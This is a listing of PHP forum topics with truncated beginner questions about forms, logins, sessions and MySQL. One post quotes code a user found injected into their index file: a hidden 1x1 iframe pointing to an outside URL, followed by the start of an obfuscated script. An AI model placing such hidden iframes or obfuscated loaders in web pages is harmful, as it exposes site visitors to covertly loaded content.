39,316 Topics

Member Avatar for
Member Avatar for finesse

Hi everyone, Can I please get somehelp, I have locked myself out, I know the user/password but can not sure which ini file to edit to input the pass? I am new to this, please help thanks [QUOTE] Welcome to phpMyAdmin Error MySQL said: Documentation #1130 - Host 'localhost' is …

Member Avatar for cwarn23
0
102
Member Avatar for Aamit

Hi, I want to add cricket game in my site... when user finish the game..he submit the score result.. i want to save that result in database... And display top scorer.... How to do this?? any link or sample example plz...

Member Avatar for Aamit
0
78
Member Avatar for achiman

please can anyone give me more information on how to solve this problem i have. im writing a php code to create a form for a ms access database, i want customers to be able to select or tick various things they want in our services either from a dropdown …

Member Avatar for achiman
0
75
Member Avatar for deesudesu

Hi all, I just learn PHP couple days ago, due to some 'trouble' in the company and my boss asking me to create an employee database Help on PHP MYSQL Forms Input With some help of dreamweaver, i finally manage to create a form for employee database but..... Sadly....some of …

0
40
Member Avatar for bwolfy

Here is the HTML [code] <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Food Order Form</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> </head> <body> <h1>A Chinese Dinner!</h1> <form name="dinner" action="wolfram0302.php" method="get"> <table border="6" cellspacing="1" width="600"> <tr> <td>First Name:<input name="first" /> Last Name: <input name="last" /> </td><br /> </tr> <tr> …

Member Avatar for nathenastle
0
153
Member Avatar for snefmoo

im trying to create a feedback form that allows the user to select a recipent from a drop down menu so that once the send button is hit, the email is sent to the persons email address in the list. i have thelist created and have attempted the php handler …

Member Avatar for nathenastle
0
90
Member Avatar for jonow

Hello, I believe I am asking the correct thing in the right forum. How can I set up a system on my website that has some sort of login page were you have a username and password and then it takes to the pages of the website that you can …

Member Avatar for samarudge
0
119
Member Avatar for alexgv14

I have this foreach loop that loops through the title and link of an xml file. I want to be able to sperate the title and put it into an array or assign each title to a variable. I also want to do the same thing with the link. Could …

Member Avatar for alexgv14
0
85
Member Avatar for prawin@123

Hi a new bee to php, Can any one help me, i AM creating a login form which consists of name address and email id , what is the problem i have here is when entering datas into address field , it throws error as [ICODE]errorYou have an error in …

Member Avatar for prawin@123
0
107
Member Avatar for SofiaMaria

Hi there, I am new to Php and MySql. However, i have been learning for some time now. I get the above error and my line 77 has the following statement: $result=mysql_query($query,$conn); Any ideas? If you need more of the code please let me know. Thanks a lot, Sofia

Member Avatar for nav33n
0
1K
Member Avatar for khr2003

hi I am not sure if this is the right section, but the files I am using in my website are written in php language. Yesterday, I try to edit my files and found at the end of the index file this code: [CODE]<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l4963660743084(l4963660743855){ …

Member Avatar for cwarn23
0
1K
Member Avatar for irotsenmar

can someone tell me what is the best php software to install on IIS with php5 and mysql to make blogs and classifieds? Thanks

Member Avatar for jacksan
0
119
Member Avatar for alexgv14

Ok so I have this xml file [code] <?xml version="1.0" encoding="utf-8"?> <rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"> <channel> <atom:link rel="self" href="http://www.ubcmiami.org/podcasts/podcast.xml" type="application/rss+xml" /> <lastBuildDate>Mon, 09 Mar 2009 17:17:39 -0400</lastBuildDate> <title>UBC Miami - Messages</title> <itunes:author>UBC Miami</itunes:author> <link>http://www.ubcmiami.org</link> <generator>Podcast Maker v1.3.8b - http://www.lemonzdream.com/podcastmaker</generator> <description><![CDATA[Weekend Messages from UBC in Miami, FL. We are transformational community …

Member Avatar for alexgv14
0
168
Member Avatar for khr2003

hi I have designed a php script an was wondering about a way that I do not allow the customer who buys to install it on more than one domain. I am concerned about the logic of it more than the scripting, but if there is a script available to …

Member Avatar for almostbob
0
167
Member Avatar for Designer_101

Hi The user clicks on a buttons to delete all posts in a thread (this also deletes the parent post). The code is bellow. This however isnt working, its deleting all the parent posts, even those that dont correspond to the topic clicked on. Any ideas [CODE] if (isset ($_GET['delete']) …

Member Avatar for humbug
0
271
Member Avatar for phpNewbie

i'm still struggling with php - its soooo confusing to me this is the code i have now - is it in the wrong order? or whats missing please to make it work - i'm trying to get a result if 'both' genders are selected and if 'any' origin is …

Member Avatar for phpNewbie
0
150
Member Avatar for cosby

hi everyone i have a script that upload a file to the server and i am running apache2 so the default apache usersis www-data and group www-data,so as i upload the file i want each and every file that uploaded to the server to change from www-data to staff user …

Member Avatar for digital-ether
0
126
Member Avatar for GavinHolt

Hi everyone! One of the things that many websites don’t have, or have a poor implementation of is a contact form. Contact forms are one of the easiest methods to get feedback from users and often underestimated... I know many people don’t have the skills or time to write a …

0
53
Member Avatar for Renzokouken_22

Guys We have a project.. . Its' a sales and inventory system.. . My question is can PHP and Java plus MySQL.. Work together.. PHP obviously runs in a web browser. But I wanted also the java program to run also in the web browser, can I also run the …

Member Avatar for digital-ether
0
92
Member Avatar for sikka_varun

Hi All, I have a PHP Application and a folder in that say, online_training. Now i want this online_training to be secured.. It contains some pdf and swf files... I am using databases and PHP Sessions for user validation but i can still directly access my pdf files without logging …

Member Avatar for digital-ether
0
139
Member Avatar for Designer_101

Hi I've quite a while into my PHP course now however I seem to have missed something, I keep seeing things like: [CODE]if ($variable_name) {..[/CODE] It's quite scary because I should really know this and it seems extremely basic so sorry for the questions simplicity. Is it asking wether the …

Member Avatar for Designer_101
0
106
Member Avatar for BASSUHG

I have a table with roll num,name,games. Roll num is primary key, I am able to store the data in mysql table and able to retrieve it back using PHP. I enter the details through the form using php script. 01 A Tabletennis 02 A Cricket 03 B Tabletennis 04 …

Member Avatar for BASSUHG
0
53
Member Avatar for BASSUHG

hi everyone, i am retrieving some 25 dates from html table, and calculating. suppose date is 03-feb-2009 i am converting it to 03-02-2009 and calculating with present date. It gives the same answer to each and every date calculated, any one helpme, i have tried google n php.net, its urgent …

Member Avatar for BASSUHG
0
186
Member Avatar for gagan22

Hi everyone, I found that problem is not in session probem is that when i am login in one php page where i already used session but when i am doing login with login name and password . I have seen that when i am printing value login name and …

Member Avatar for nav33n
0
201
Member Avatar for siri_ajay

Hi every body I have a problem.I m uploading images from main domain in admin side.I want to display those images in subdomain.Is it possible to point the images path in subdomain.Presently what i did is i create separate admins for main domain and subdomain and uploading same images from …

Member Avatar for chrishea
0
33
Member Avatar for AutoC

Hi, I'm new to php.I had to include common content to a lot of webpages in my website like menubar etc. and i was told i could load them dynamically from a single file using php.Can someone help me with this?

Member Avatar for kadimi
0
118
Member Avatar for serkan sendur

hi guys, i need to know what should i type to my browser to access apache/tomcat webservers root web folder. there should be some config files that i could see. help please thanks.

Member Avatar for nav33n
0
58
Member Avatar for rEhSi_123

Hello, Basically I am creating a Forum system and I want to add a feature in which the the 'admin' of the forum can delete the topic created inside the forum. I know I would need the following sql statement: [code=php] $sql = "DELETE FROM `forum_topics` WHERE `id`='".$id."'; [/code] Currently …

Member Avatar for rEhSi_123
0
245
Member Avatar for veledrom

Hi, Can i use sleep() for 1 hour? I mean is there any expiry time for it or browser or session so on. Purpose is to send 2000 emails every one hour. Thanks

Member Avatar for digital-ether
0
189
Member Avatar for santhanalakshmi

Hi, Anyone,please help me ............... my first page called `index.php` (which has username and password field to enter to move on to next page) index.php code <?php session_start(); mysql_connect("localhost", "root", "")or die("cannot connect"); mysql_select_db("artedb")or die("cannot select DB"); if (isset($_POST) && ($_POST == "submit")) { if($_POST=="" && $_POST=="") { $msg="Please enter …

Member Avatar for Designer_101
0
360

The End.